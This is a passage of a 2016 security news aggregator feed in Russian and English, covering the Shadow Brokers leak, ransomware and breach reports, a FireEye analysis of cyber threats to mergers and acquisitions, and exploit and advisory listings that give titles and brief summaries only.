    Скорее всего, трюк "Теневых брокеров" является желанием российской разведки нанести ответный удар по США после обвинений во взломе серверов Национального комитета Демократической партии. Этот взлом и последующая утечка информации были истолкованы как попытка России вмешаться в ход президентских выборов США.

    Опасный этап киберагрессии

    Сейчас вопрос о трансатлантической безопасности стоит острее, чем когда-либо. США дали официальный ответ на этот шаг, несмотря на то что они знают о причастности России к этому. И теперь уступка российских "Теневых брокеров" сделает любой такой ответ гораздо более сложным.

    США и их союзники, конечно, скорее всего, причастны к хакерскому взлому. Regin (вредоносное программное обеспечение, которое используется для взлома телекоммуникационных сетей, гостиниц и предприятий от Бельгии до Саудовской Аравии) – это инструмент, используемый в США и Великобритании, в то время как Equation Group - это наиболее опасная и сложная группировка, которая проводит взломы повсеместно.

    И если Москва не сумела понять предостережение Вашингтона, то Эдвард Сноуден, живущий сейчас в России, смог.

    "Косвенные доказательства и банальное знание ситуации явно указывают на российский след в этом деле. Кто-то явно пытается намекнуть, что развитие игры может оказаться довольно запутанным делом", - отметил он в "Твиттере" своим 2,3 млн фолловерам.

    В США полагают, что Сноуден является невольным агентом российской разведки, если не ее инструментом.

    "Российская сторона проявила инициативу в этом деле еще до взлома почты Национального комитета Демократической партии. Сейчас, когда дело дошло до угроз США в киберпространстве, Россия находится в выгодном положении. Она становится гораздо более агрессивной", - заявил Джим Льюис, бывший сотрудник госдепартамента США.

    И самый сложный вопрос сейчас – это выявить источник кибератак. Для киберсверхдержав практически не существует ограничений, которые помешали бы властям наказывать тех, кто совершает атаки.

    В таких агентствах, как АНБ США и ЦПС в Великобритании, давно сложилась целая система секретности, окружающая работу по кибернаблюдению и уходящая своими корнями к истокам разведки времен Второй мировой войны. Американская разведка очень быстро узнала, что за взломом Службы управления персоналом США в июне прошлого года стоял Китай. Однако потребовалось время на то, чтобы решить, какой ответ следует дать и чего они ждали в ответ.

    Сейчас все больше нарастает ощущение того, что необходимо больше публичной информации обо всех этих процессах, чтобы положить конец кибервойне, которая уже выходит из-под контроля.

    "До сегодняшнего момента степень киберзащиты была вполне приемлема. Однако сейчас настал тот момент, когда люди начали говорить, что пора называть имена тех, кто причастен к кибератакам", - отметил Лоусон из RUSI.

    Публично названные злоумышленники могут оказаться очень сильными противниками. Активность Китая в отношении американских компаний заметно снизилась, после того как американские власти публично предъявили обвинение пяти высокопоставленным китайским военным чиновникам в прошлом году, доказав Пекину, что точно знали о причастности китайских хакеров ко взлому. Также США дали понять, что если ситуация будет и дальше развиваться в том же духе, реакция США окажется еще более жесткой. Однако многое зависит и от противника. Россия, в отличие от Китая, экономически не зависит от США.

    Кремлевских хакеров гораздо сложнее обнаружить. Особым направлением для российских хакеров в последние 18 месяцев стали атаки, проводимые с прокси-серверов, заявил высокопоставленный британский чиновник.

    Россия стала агрессивнее: ее кибероперации зачастую не только вскрывают информацию, но и используют ее в качестве оружия.

    И если используются новые инструменты, то методика новизной не отличается. Бывший агент ЦРУ Филипп Эйджи занял высокий пост в 1970-е гг. после публикации ряда разоблачений о деятельности разведывательного агентства. Сам себя он называл осведомителем. Но в действительности действовал по указанию КГБ. Использование КГБ Эйджи было манипуляцией. Он старался повлиять на принятие решений ЦРУ.

    "Теневые брокеры" могут оказаться таким же явлением, просто адаптированным к реалиям XXI века. Оба являются примерами того, что советские стратеги называли рефлексивным управлением – способ управления, при котором основания для принятия решения передаются одним субъектом другому. Государство может убедить противника не отвечать на вмешательство на выборах, повысив вероятность предоставления информации о собственной тактике.

    "Это старая тактика. России всегда лучше удавались такие вещи, чем нам. А сейчас вдобавок ко всему она может пользоваться всеми преимуществами интернета. Сегодня оружием является информация", - отметил Льюис.

    orig: 2016-08-23 06:21:09 / https://www.anti-malware.ru/news/2016-08-23/20756 (click post title)



    Windows Self-Healing Tool не исправляет проблемы с Windows 10 и может принести больше вреда, чем пользы

    Благодаря публикации на форуме пользователей Microsoft Surface утилита вызывает доверие.

    С релизом юбилейного обновления Windows 10 Anniversary Update пользователи по всему миру столкнулись с рядом проблем, начиная от зависания систем и заканчивая выходом из строя веб-камер. Немудрено, что многие сразу же бросились на поиски утилит для исправления неполадок. Пользователям, ищущим подходящую программу, стоит обходить стороной Windows Self-Healing Tool, уверен Эд Ботт (Ed Bott) из ZDNet.

    Утилита, по всей видимости предназначенная для исправления вызванных Windows 10 проблем, распространяется через ряд новостных технологических сайтов. Благодаря логотипу Microsoft и публикации на форуме пользователей Microsoft Surface она вызывает доверие. Однако Ботт заподозрил неладное и решил проанализировать Windows Self-Healing Tool.

    Как обнаружил исследователь, датой регистрации авторских прав является 2015 год – рановато как для исправления проблем, вызванных новой Windows 10. В качестве правообладателя указана Microsoft Mobile Oy – финская дочерняя компания Microsoft, основанная после приобретения Nokia и упраздненная в нынешнем году.

    Распространявшая утилиту учетная запись Azure Blob Storage – та же, что использовалась для распространения инструмента Nokia Software Recovery Tool, предназначенного для повторной инсталляции на устройствах Lumia приложений для Windows Phone.

    По словам Ботта, утилита распространяется с серверов Microsoft, однако к Windows 10 Anniversary Update не имеет никакого отношения и по всей видимости была создана одним разработчиком, неавторизованным командой поддержки Windows. Единственная функция программы заключается в выполнении команд PowerShell для перезапуска устройства. Судя по отображаемому утилитой уведомлении («Для завершения процесса восстановления необходимо перезапустить Surface»), она предназначена для гибридных ноутбуков, а не для десктопных компьютеров.  

    Согласно Ботту, сами по себе команды PowerShell вполне безобидны, однако их комбинации могут иметь неожиданные «побочные эффекты». К примеру, они могут удалить персональные настройки энергопотребления и переустановить приложения Windows 10 UWP (Universal Windows Platform) без сохранения установленных ранее настроек.   

    orig: 2016-08-23 06:20:44 / http://www.securitylab.ru/news/483465.php (click post title)



    Вымогатель DetoxCrypto отправляет операторам скриншоты экрана компьютера жертвы

    Предположительно, на основе информации скриншота злоумышленники устанавливают сумму выкупа.

    Исследователь под псевдонимом MalwareHunterTeam обнаружил новый вид вымогательского ПО, распространяемого в двух версиях, одна из которых способна делать скриншоты экрана компьютера жертвы и отправлять их на C&C-сервер злоумышленников. Вторая распространяется под видом приложений Pokémon GO, сообщает Bleeping Computer.

    Оба варианта обладают функционалом, стандартным для вымогательского ПО. Вредоносы шифруют файлы при помощи алгоритма AES и способны остановить работу служб MySQL и MSSQL на инфицированном компьютере. Оказавшись на системе, оба трояна отображают уведомление о выкупе, одновременно запуская аудио.

    Исследователю пока не удалось определить пути распространения вредоносного ПО. По его словам оба варианта содержат исполняемый файл, включающий несколько компонентов. После запуска из основного файла извлекаются файл MicrosoftHost.exe, аудиофайл, изображение заднего фона и исполняемый файл с названием в зависимости от варианта (Calipso.exe или Pokemon.exe).

    MicrosoftHost.exe используется для шифрования контента и остановки процессов MySQL и MSSQL на инфицированном компьютере. Второй исполняемый файл может отображать уведомление о блокировке, воспроизводить аудиофайл и расшифровать зашифрованный контент, если жертва предоставит правильный пароль.

    Основная особенность версии Calipso заключается в возможности делать снимки экрана и отправлять данные злоумышленникам. Как полагает эксперт, на основе информации скриншота операторы трояна устанавливают сумму выкупа.

    orig: 2016-08-23 05:31:07 / http://www.securitylab.ru/news/483464.php (click post title)



    Разработчик игр Epic Games подвергся кибератаке

    В результате инцидента были похищены данные порядка 808 тыс. пользователей.

    Американский разработчик компьютерных игр Epic Games подвергся атаке хакеров, похитивших данные порядка 808 тыс. пользователей форумов, посвященного движку Unreal Engine и игре Unreal Tournament. Утекшая информация включает электронное адреса, даты рождения и личные сообщения.

    Согласно официальному уведомлению компании, пароли пользователей форумов Unreal скомпрометированы не были, поэтому нет необходимости их менять. Тем не менее, злоумышленникам удалось похитить использующиеся на более старых форумах, посвященных играм серии Unreal, Gears of War и Infinity Blade, подсоленные пароли для входа в учетные записи, активные с июля прошлого года.

    «Нам известно, что в результате недавней компрометации форумов Unreal Engine и Unreal Tournament произошла утечка электронных адресов и других связанных с ними данных, однако инцидент не затронул пароли в какой бы то ни было форме, ни подсоленные, ни хешированные, ни в открытом виде. Произошла утечка данных, содержащихся в БД vBulletin, однако пароли хранятся в другом месте», – сообщается в уведомлении Epic Games.

    Атака стала возможной благодаря уязвимости в vBulletin. Ранее с ее помощью злоумышленникам удалось взломать форум для разработчиков Dota 2, форум Clash of Kings, геймерский сайт DLH.net и форум, посвященный Ubuntu.

    orig: 2016-08-23 04:54:12 / http://www.securitylab.ru/news/483463.php (click post title)



    WordPress Bonkersbeat / Method / Awake Arbitrary File Download

    WordPress Bonkersbeat theme version 1.0, Method theme version 1.8, and Awake theme version 3.2 suffer from an arbitrary file download vulnerability.

    orig: 2016-08-23 04:44:44 / https://packetstormsecurity.com/files/138480/wpthemedlskin-download.txt (click post title)



    ФАС проверит 46 госорганизаций на предмет нарушений запрета на покупку иностранного ПО

    В документации 32 тендеров отсутствовали пояснения относительно предпочтения иностранного программного обеспечения отечественному.

    Федеральная антимонопольная служба России проведет провеку 46 госструктур, предположительно нарушивших законодательство в сфере закупок программного обеспечения. Об этом сообщается в письме замглавы ведомства Рачика Петросяна сенатору Людмиле Боковой, пишут «Известия».

    По данным издания, в минувшем мае сенатор направила прошение в адрес руководителя ФАС Игоря Артемьева с просьбой дать правовую оценку 46 тендерам на соответствие требованиям ФЗ-188 (поправки в законы «О контрактной системе в сфере закупок...» и «Об информации...») и постановления правительства № 1236 от 16 ноября 2015 года, устанавливающие запрет на закупку программных решений зарубежного производства для государственных и муниципальных нужд.

    В ходе анализа единой информационной системы в сфере закупок участники Ассоциации разработчиков программных продуктов «Отечественный софт» (АРПП), куда входят более 50 производителей, включая 1С, ABBYY и «Доктор Веб», обнаружили 46 тендеров на закупку иностранного ПО, проведенных с нарушением законодательства. В частности, в документации 32 торгов отсутствовали пояснения относительно предпочтения иностранного программного обеспечения отечественному. Документы остальных тендеров были составлены с нарушениями.

    По словам Петросяна, запросы о предоставлении пояснений уже получили три структуры: Федеральная служба госрегистрации, кадастра и картографии, Информационно-аналитический центр поддержки ГАС «Правосудие» и Центр по обеспечению деятельности казначейства России.  

    orig: 2016-08-23 04:31:29 / http://www.securitylab.ru/news/483462.php (click post title)



    Facebook открыл код библиотеки классификации текста fastText

    Лаборатория искусственного интеллекта Facebook объявила об открытии исходных текстов библиотеки fastText, предоставляющей средства для классификации текста с использованием методов машинного обучения. Код написан на языке C++ и открыт под лицензией BSD. Библиотека позволяет организовать автоматическое назначение категорий для произвольного текста, на основании предварительно проведённого обучения по наборам текстов с уже известными категориями. Например, fastText может оценить является ли письмо спамом или определить к какой категории относится статья (научная, спорт, финансы, развлечения и т.п.), после обучения по типовым базам спама и тематических статей.

    orig: 2016-08-23 02:50:50 / http://www.opennet.ru/opennews/art.shtml?num=45018 (click post title)



    Блокчейн-риски ч.2: Необоротность записи и рейдерство

        В Украине произошла реформа - записи в Госреестр прав собственности теперь могут вносить нотариусы на местах. В итоге по данным еженедельника "Зеркала недели" нотариус из Киевской области 2 (!) раза переписывал права собственности на здание в центре с Юникредит Банка на других лиц, не имея на это правовых оснований.    2 раза органы власти возвращали здание обратно Юникредит Банку, отключит в итоге нотариуса на 60 дней из системы Госреестра. А что было бы если Госреестр работал на принципах блокчейна? Делать форк Госреестра и внедрять его по всей стране?...

        Другой замечательный пример - один умалишенный подал в управу Сан-Диего правильное оформление заявление на передачу прав собственности на городской стадион. 

        Так как никакой авторизации протокол приема заявлений не предусматривал - умалишенный стал собственником стадиона. Пересмотреть заявление было возможно по иску к умалишенному, но так как он умалишенный в суд его вызвать было нельзя. Круг замкнулся..

     

        Перед блокчейнизацией процессов критически важно обратить внимание на качество и архитектуру процессов. Им необходим аудит и реинжиниринг, а разрабатываемым системам - архитектура безопасности. 

        Архитектура безопасности не обойдется без классических 3-ех разделов - Управление доступом, аутентификацией и авторизацией, Логирование и аудит, Управление целостностью.


    orig: 2016-08-23 02:00:00 / http://feedproxy.google.com/~r/blogspot/SecurityView/~3/D-S0cdAqGYA/2.html (click post title)



    Unsealing the Deal: Cyber Threats to Mergers and Acquisitions Persist in a Hot Market

    Risks Posed by Sensitive Corporate Communications, Broadened Attack Surface

    In 2015, a record $5 trillion dollars was tied up in mergers and acquisitions (M&A) deals, according to JP Morgan. So far, mega deals in 2016 include Microsoft’s purchase of LinkedIn, Shire’s acquisition of Baxalta, and Marriott’s acquisition of Starwood. These market-moving events often involve a massive expenditure of capital and are largely conducted in secret to comply with legal requirements, making them attractive targets for cybercriminals and nation-state threat groups alike. Threat actors are primarily driven by three motives related to M&A activity:

  • Stealing non-public information leading up to the deal’s announcement for future financial gain.
  • Exploiting sensitive financial information generated during the M&A process.
  • Exploiting the increased attack surface created by companies combining their operations.
  • Additionally, acquisition targets may be compromised prior to the M&A for reasons wholly unrelated to the transaction. Enterprises should be especially alert for malicious cyber activity before, during, and shortly after M&A-related activities, ensuring that due-diligence processes incorporate assessments of each party’s cyber security practices.

    Trove of Documents to Exploit Capital Markets

    M&A activity generates significant amounts of sensitive corporate communications, which cyber criminals may attempt to obtain and exploit for financial gain. For example, cyber criminals could attempt to gather data about a company's operations, financial status or future plans, which could then be used in stock market trades. To obtain such sensitive information, attackers can target the companies directly involved in the M&A activity themselves or other organizations involved in the deal, such as law firms and PR agencies.

    The U.S. Securities and Exchange Commission (SEC) in 2015 announced that since at least 2010, two Ukrainian cyber criminals breached multiple newswire services and distributed pre-release information to a rogue network of international traders and hedge fund managers.

    In 2013 and 2014, a group of cyber criminals known as FIN4 sought to acquire information about M&A discussions in order to game the stock market. The group frequently used M&A and SEC-themed lures with Visual Basic for Applications (VBA) macros implemented to steal the usernames and passwords of key individuals. Many of FIN4’s lures were apparently stolen documents from actual deal discussions that the group then weaponized and sent to individuals directly involved in the deal. FIN4 typically included links to fake Outlook Web App (OWA) login pages designed to capture the user’s credentials. Once equipped with the credentials, FIN4 then obtained access to real-time email communications and presumably insight into potential deals and their timing.

    Seeking Insights to Gain the Upper Hand in Negotiations

    One side involved in M&A negotiations could use cyber espionage to acquire sensitive information about a deal counterparty in an attempt to obtain more favorable terms. Based on past threat actor activity, we have observed multiple China-based threat actors breach companies to observed this type of activity in sizeable deals involving Chinese state-owned enterprises.  

    High tech companies in particular face an evolving cyber risk as Chinese interests advance toward acquisition of technology and expertise that will sustain the country’s economic growth through a shift to an economy built on knowledge-based products and services. During the past decade, flush with cash and often with state backing, Chinese companies have snatched up well-known Western companies in industries ranging from agriculture to energy to consumer products. The Wall Street Journal reported that as of May 2016, Chinese companies have struck over $110.8 billion in overseas deals, surpassing the $106.8 billion in deals done in 2015, despite a slowdown in the Chinese economy.

    As recently as late 2015, we have observed several likely China-based threat groups targeting companies engaged in M&A-related activity. At least four different China-based APT groups conducted computer network intrusions that we believe were primarily motivated by the targeted companies’ involvement in an acquisition.

    In 2015, Mandiant conducted a compromise assessment for a business services company. We identified two periods of activity by the China-based threat group APT8 within the network, the most recent of which coincided with the victim company's participation in acquisition negotiations. Although our visibility into APT8's operations was limited, the threat group possibly sought information pertaining to the negotiation and acquisition itself, based on the timing in which APT8 resumed their activity within the network.

    New Companies, New Attack Surfaces

    Mergers and acquisitions often result in an increased attack surface for the companies involved. As two or more companies integrate their IT assets, a group that has compromised one company could potentially use that access to compromise the other(s). For instance, the Australian telecom firm Telstra in 2015 announced that the networks of a recently acquired subsidiary, Pacnet, were exploited.

    Although the most obvious example of the increased attack surface issue is when M&A activity causes companies to combine their networks, it can also include factors such as one company’s particular susceptibility to social-networking attacks or vulnerabilities in products produced by one of the companies. In other words, strong security practices at one company can be obviated by poor practices at the other.

    This threat is likely elevated during and immediately after a merger or acquisition, since IT employees at the purchasing company may not have had time to analyze the security posture of the purchased company, or the combined staffs are unable to comprehensively monitor the entirety of the newly combined network. Mergers and acquisitions also generally increase the opportunities for “lateral compromise” by targeting trusted relationships (i.e., the relationship between the companies involved in the M&A activity). When a well protected network recognizes a less secure network as trusted, the overall security posture of the combined network is lowered, allowing intruders to gain access by exploiting hastily-granted trust between systems.

    Mandiant has observed instances where APT actors were able to regain a foothold in an organization’s network following remediation by compromising the network of an affiliate. Actors targeting companies during M&A activity could use similar tactics to move laterally from one company to another.

    An example of this is when Mandiant performed an incident response investigation for Company A, where we identified the presence of several advanced threat actors. After remediating Company A’s networks, an APT group attempted to re-compromise the network through a sister organization (Company B), which had also been previously compromised. Although this effort failed, a different APT group was able to regain access to Company A’s systems through a strategic web compromise embedded on Company B’s website. Our investigation of the sister company’s network revealed that the vast majority of stolen data there pertained to the network infrastructure linking the organizations.

    Another example occurred at Company C, where we identified four APT groups active in a network. Analysis about the timing and behavior of at least one of these groups suggested that they were able to leverage their previously attained access at Company D (a sister organization) to access Company C’s network. During our investigation at Company D, we discovered at least two threat groups, with activity dating back three years earlier. We believe these actors used information harvested from Company D’s network to help exploit Company C in a subsequent operation.

    Mitigation

    Business leaders responsible for M&A business strategy should be aware that threat actors often target companies engaged in mergers and acquisitions, and that malicious activities such as phishing attacks will likely increase during such periods. Additionally, a data breach or severe security posture weaknesses could negate the business strategy of acquisition due to the often-high cost of fixing weaknesses or conducting incident response. Technology risk should be evaluated and incorporated into the overall business risk strategy before an M&A transaction is completed. In addition, companies engaged in M&A should ensure that an examination of cyber security is included as a key component of the due diligence process.

    Today cyber due diligence is oftentimes performed superficially and as an afterthought. This examination should include details of the company’s security capabilities such as data safeguards, access controls, threat detection, incident response and infrastructure security controls, the threat landscape of the organization, any records of past attacks, and any underground actors known to be particularly interested in targeting the company. Allowing sufficient time (four to six weeks) to perform an actual compromise assessment on the sellers’ infrastructure will provide the optimal visibility into the security posture of the acquisition.

    When sufficient time is provided and cyber due diligence is conducted, senior executives at the acquiring organization will understand the business threats and technology risk posed by the acquisition target, enabling them to incorporate this information into the overall enterprise risk picture for informed decision-making. In the majority of transactions, the decision to move forward with the acquisition will still continue; however, senior executives will be better equipped to make informed decisions about:

    When to Start Cyber Security Due Diligence

    It’s important for all parties to a transaction to work with their respective counsel to ensure any cyber due diligence activities are performed in a compliant manner (e.g., to avoid creating privacy issues) and in a way that helps preserve any available legal privileges.

    Cyber security should be planned for like any other due diligence – as early as possible. Because of some fairly specific requirements to ensure the quality of cyber security due diligence, some language may need to be inserted into agreement documents such as a Letter of Intent (LOI). This will enable key components of a cyber security due diligence, such as network monitoring.

    M&A due diligence teams sometimes contain information technology (IT) subject matter experts (SMEs) who are occasionally asked to also provide an opinion on cyber security posture; however, cyber security is a specialized field, and if security expertise is not available on staff, due diligence providers should start planning to retain outside resources.

    What Cyber Security Due Diligence Should Be

    The following are factors that should be incorporated into effective cyber security due diligence planning. Note that M&As can vary widely in terms of ramp-up time. Some allow for a very short due diligence effort, while longer deals can afford months to assess risk. Business decisions control this pace, not the due diligence team – therefore it is important to have relatively quick and lightweight cyber due diligence options as well as longer, more in-depth approaches.

    Quick Diligence

    If the window for due diligence is short (e.g., 1-2 weeks), there is still substantial cyber security due diligence that can be accomplished to provide a high-level view of the risk levels of the seller’s environment. A week provides time for cyber security experts to conduct documentation review and interviews with seller staff, which they then analyze in a focused risk framework. The product of this activity should be a quantified risk assessment across important cyber security domains (e.g., data safeguarding, infrastructure security, and others) that results in a brief, easy-to-understand report on risk and general recommendations for the buyer.

    Even minimal cyber security due diligence should have a technical component to provide an objective view of the health of the seller’s security posture. One of the most important aspects of a technical assessment is creating a historical scorecard going back in time: Have the seller’s computers been compromised in the past, and what was the character of those breaches (advanced and persistent, commodity, insider, financial fraud, etc.)? The Freshfields survey discovered 90% of respondents believed that a past breach could reduce the value of a deal.

    Also important is a current snapshot: detecting malicious activity (or the lack of such activity) from the seller provides insight into the overall security posture and types of possible intruders already in place. This information needs to be derived and analyzed in a relatively short time frame.  With this kind of analysis, the buyer already can act knowledgably and prevent major missteps.

    In-Depth Due Diligence

    If more time is available, more detailed and granular cyber security due diligence is possible. In addition to a risk assessment conducted by cyber security analysts, software agents can be deployed in the seller’s network to report on the state of the endpoints.

    Network monitoring can examine traffic to and from the network for a period of time to collect very detailed information on the state of the organization’s cyber security and what compromises are already happening, or have already happened. This allows the buyer to know the seller’s environment inside and out from a real-world risk perspective, and would provide both the high-level view needed to inform decisions and granular detail to estimate remediation costs.

    Only with due diligence can risk be incorporated in planning, with various planned costs and benefits. Without due diligence, there are only unexpected costs and reputational impacts.

    Post-Acquisition Activities

    Information gathered during due diligence can be further used to guide post-acquisition activities.

    Integration

    A fairly common follow-on activity, particularly with mergers, is integration of the two companies’ IT infrastructure. In the long run, this should reduce costs and ease management; however, in the short-term it can create its own set of problems and become a long-term effort.

    One of the first questions to answer is: what can be trusted? Is it safe for the buyer to connect to certain acquired systems? Can two-way trust relationships be established? All of these depend on assessing the security of both the overall environment and specific systems. Cyber security due diligence provides a good start down this road, and can allow for a level of effort and cost estimates to be made and included in IT planning.

    The Future Has Already Been Here

    The impact of adverse cyber security events has been felt by businesses for some time, and paying a little attention to the news gives some sense of the scale of the challenges that have emerged as even local businesses become exploitable by global criminals. Cyber security risk is not science fiction, even though it has essentially been treated as science fiction by being left out of M&A processes. Acquiring companies and due diligence practitioners must now catch up to the reality of the costs and risks that cyber security issues create, and the benefits that cyber security due diligence can bring. Doing so will eventually separate successes from the also-rans.

    For more information on how Mandiant Consulting can help before, during and after a merger or acquisition, visit Fireeye.com/services.html.

    orig: 2016-08-23 00:40:11 / http://www.fireeye.com/blog/threat-research/2016/08/unsealing_the_deal.html (click post title)



    [remote] - Phoenix Exploit Kit - Remote Code Execution (Metasploit)

    Phoenix Exploit Kit - Remote Code Execution (Metasploit)

    orig: 2016-08-23 00:00:00 / https://www.exploit-db.com/exploits/40294 (click post title)



    [webapps] - chatNow - Multiple Vulnerabilities

    chatNow - Multiple Vulnerabilities

    orig: 2016-08-23 00:00:00 / https://www.exploit-db.com/exploits/40293 (click post title)



    [webapps] - SimplePHPQuiz - Blind SQL Injection

    SimplePHPQuiz - Blind SQL Injection

    orig: 2016-08-23 00:00:00 / https://www.exploit-db.com/exploits/40292 (click post title)



    [dos] - Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write

    Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write

    orig: 2016-08-23 00:00:00 / https://www.exploit-db.com/exploits/40291 (click post title)



    [webapps] - WordPress Mail Masta Plugin 1.0 - Local File Inclusion

    WordPress Mail Masta Plugin 1.0 - Local File Inclusion

    orig: 2016-08-23 00:00:00 / https://www.exploit-db.com/exploits/40290 (click post title)



    Red Hat Security Advisory 2016-1650-01

    Red Hat Security Advisory 2016-1650-01 - Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector, JBoss HTTP Connector, Hibernate, and the Tomcat Native library. This release serves as a replacement for Red Hat JBoss Web Server 2.1.0, and includes several bug fixes.

    orig: 2016-08-22 23:25:00 / https://packetstormsecurity.com/files/138473/RHSA-2016-1650-01.txt (click post title)



    Red Hat Security Advisory 2016-1649-01

    Red Hat Security Advisory 2016-1649-01 - Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector, JBoss HTTP Connector, Hibernate, and the Tomcat Native library. This release serves as a replacement for Red Hat JBoss Web Server 2.1.0, and includes several bug fixes.

    orig: 2016-08-22 23:24:00 / https://packetstormsecurity.com/files/138472/RHSA-2016-1649-01.txt (click post title)



    Red Hat Security Advisory 2016-1648-01

    Red Hat Security Advisory 2016-1648-01 - Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector, JBoss HTTP Connector, Hibernate, and the Tomcat Native library. This release serves as a replacement for Red Hat JBoss Web Server 2.1.0, and includes several bug fixes.

    orig: 2016-08-22 23:23:00 / https://packetstormsecurity.com/files/138471/RHSA-2016-1648-01.txt (click post title)



    В закон «Об электронной подписи» внесены изменения


    Федеральный закон «О внесении изменений в отдельные законодательные акты Российской Федерации в части применения электронных документов в деятельности органов судебной власти» от 23 июня 2016 года № 220-ФЗ дополнил статью 6 «Условия признания электронных документов, подписанных электронной подписью, равнозначными документам на бумажном носителе, подписанным собственноручной подписью» федерального закона от 6 апреля 2011 года № 63-ФЗ «Об электронной подписи» новыми положениями, в том числе частью 3-1 следующего содержания:
    3-1. Если федеральными законами, принимаемыми в соответствии с ними нормативными правовыми актами, предусмотрено, что документ должен подписываться несколькими лицами, электронный документ должен быть подписан лицами (уполномоченными должностными лицами органа, организации), изготовившими этот документ, тем видом подписи, который установлен законодательством Российской Федерации для подписания изготовленного электронного документа электронной подписью.Мой комментарий: К сожалению, наши законодатели так и не научились писать законы простым русским языком. Если продраться через словесные хитросплетения, то можно выделить две важных аспекта:

    С моей точки зрения, писать в законе, что документ  должен подписывать тот, кто его изготовил, довольно-таки глупо, поскольку что ещё можно понимать под «изготовлением» документа, как не, в конечном итоге, его подписание уполномоченным лицом? :) А так у пронырливых юристов появляется шанс на оспаривание правомочности документа на том основании, что подписант его не «изготавливал»!

    Отмечу, что в бумажном делопроизводстве в процессе создания и прохождения документа на нем достаточно часто появляется несколько подписей. Однако большинство из этих подписей для придания юридической силы готовому документу не нужны, их назначение иное - как правило, они фиксируют факты согласования проекта документа или ознакомления с ним.

    Кроме того, часть 4 ст.6 изложена в новой редакции:
    Было: 4. Одной электронной подписью могут быть подписаны несколько связанных между собой электронных документов (пакет электронных документов). При подписании электронной подписью пакета электронных документов каждый из электронных документов, входящих в этот пакет, считается подписанным электронной подписью того вида, которой подписан пакет электронных документов.

    Стало: 4. Одной электронной подписью могут быть подписаны несколько связанных между собой электронных документов (пакет электронных документов). При подписании электронной подписью пакета электронных документов каждый из электронных документов, входящих в этот пакет, считается подписанным электронной подписью того вида, которой подписан пакет электронных документов. Исключение составляют случаи, когда в состав пакета электронных документов лицом, подписавшим пакет, включены электронные документы, созданные иными лицами (органами, организациями) и подписанные ими тем видом электронной подписи, который установлен законодательством Российской Федерации для подписания таких документов. В этих случаях электронный документ, входящий в пакет, считается подписанным лицом, первоначально создавшим такой электронный документ, тем видом электронной подписи, которым этот документ был подписан при создании, вне зависимости от того, каким видом электронной подписи подписан пакет электронных документов.Мой комментарий: В данном случае законодатель вынужден исполнять ритуальные «танцы с бубном» из-за того, что в законодательстве РФ нет четкого определения понятия «подпись» и её функций. Есть несколько сильно различающиеся с правовой точки зрения ситуаций:
    Не случайно, например, в США при проставлении электронной подписи во многих случаях законодательство требует явно указывать намерение подписанта (утверждение документа, согласование, ознакомление, заверение авторства, подтверждение факта существования, обеспечение целостности и аутентичности сообщения и т.д.)

    Ну а пока у нас не появится настоящая архивно-документационная наука, подобные «пляски аборигенов» будут становиться всё более частым явлением, на радость хорошо зарабатывающим на некачественном законодательстве практикующим юристам.

    Источник: Консультант Плюс
    http://base.consultant.ru/cons/cgi/online.cgi?req=doc&base=LAW&n=200008

    orig: 2016-08-22 21:05:02 / http://rusrim.blogspot.com/2016/08/blog-post_23.html (click post title)



    BENIGNCERTAIN Cisco VPN Private Key Extraction

    BENIGNCERTAIN is a remote exploit to extract Cisco VPN private keys. Note that this exploit is part of the recent public disclosure from the "Shadow Brokers" who claim to have compromised data from a team known as the "Equation Group", however, there is no author data available in this content. The tool references Cisco PIX versions 5.2(9) to 6.3(4), which were released in 2004.

    orig: 2016-08-22 18:35:20 / https://packetstormsecurity.com/files/138470/BenignCertain.tgz (click post title)



    Phoenix Exploit Kit Remote Code Execution

    This Metasploit module exploits a remote code execution in the web panel of Phoenix Exploit Kit via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

    orig: 2016-08-22 18:30:25 / https://packetstormsecurity.com/files/138469/phoenix_exec.rb.txt (click post title)



    Jaws CMS 1.1.1 Cross Site Request Forgery

    Jaws CMS version 1.1.1 suffers from a cross site request forgery vulnerability.

    orig: 2016-08-22 18:27:35 / https://packetstormsecurity.com/files/138468/VL-1923.txt (click post title)



    phpCollab CMS 2.5 Cross Site Request Forgery

    phpCollab CMS version 2.5 suffers from a cross site request forgery vulnerability.

    orig: 2016-08-22 18:26:55 / https://packetstormsecurity.com/files/138467/VL-1911.txt (click post title)



    AVS Audio Converter 8.2.1 Buffer Overflow

    AVS Audio Converter version 8.2.1 suffers from a buffer overflow vulnerability.

    orig: 2016-08-22 18:25:49 / https://packetstormsecurity.com/files/138466/VL-1920.txt (click post title)



    Testing configurations

    (This post is part of a larger post which can be found here (this will link to main post once its out). It has been separated out to keep the main post from getting too long.)
    Workstation configuration details






















    Information on the GS series VMs is available here and FS series here. DS series is available here. Amazon VM info is here.

    I used Atto Disk Benchmark on each of the disks in each of the VMs.

    The chart above summarizes the tests below. In some cases (like the GS1 and GS2), screenshots were not taken

    All Read and Write speeds are for 64MB of data in MB/sec.

    (I have no idea why the images show up so far below, but it is what it is)

    x

    orig: 2016-08-22 18:25:09 / http://binaryforay.blogspot.com/2016/08/testing-configurations.html (click post title)



    ISPconfig 3.0.5.4 p6 Cross Site Scripting

    ISPconfig version 3.0.5.4 p6 suffers from a cross site scripting vulnerability. It also leaks exception information.

    orig: 2016-08-22 18:24:21 / https://packetstormsecurity.com/files/138465/VL-1909.txt (click post title)



    HP Security Bulletin HPSBNS03635 1

    HP Security Bulletin HPSBNS03635 1 - Multiple potential remote and local vulnerabilities impacting Perl and PHP have been addressed by HPE NonStop Servers OSS Script Languages. The vulnerabilities include Perl's opportunistic loading of optional modules which might allow local users to gain elevation of privilege via a Trojan horse library under the current working directory. Revision 1 of this advisory.

    orig: 2016-08-22 18:18:17 / https://packetstormsecurity.com/files/138463/HPSBNS03635-1.txt (click post title)



    ObiHai ObiPhone 1032/1062 XSS / CSRF / DoS / Command Injection

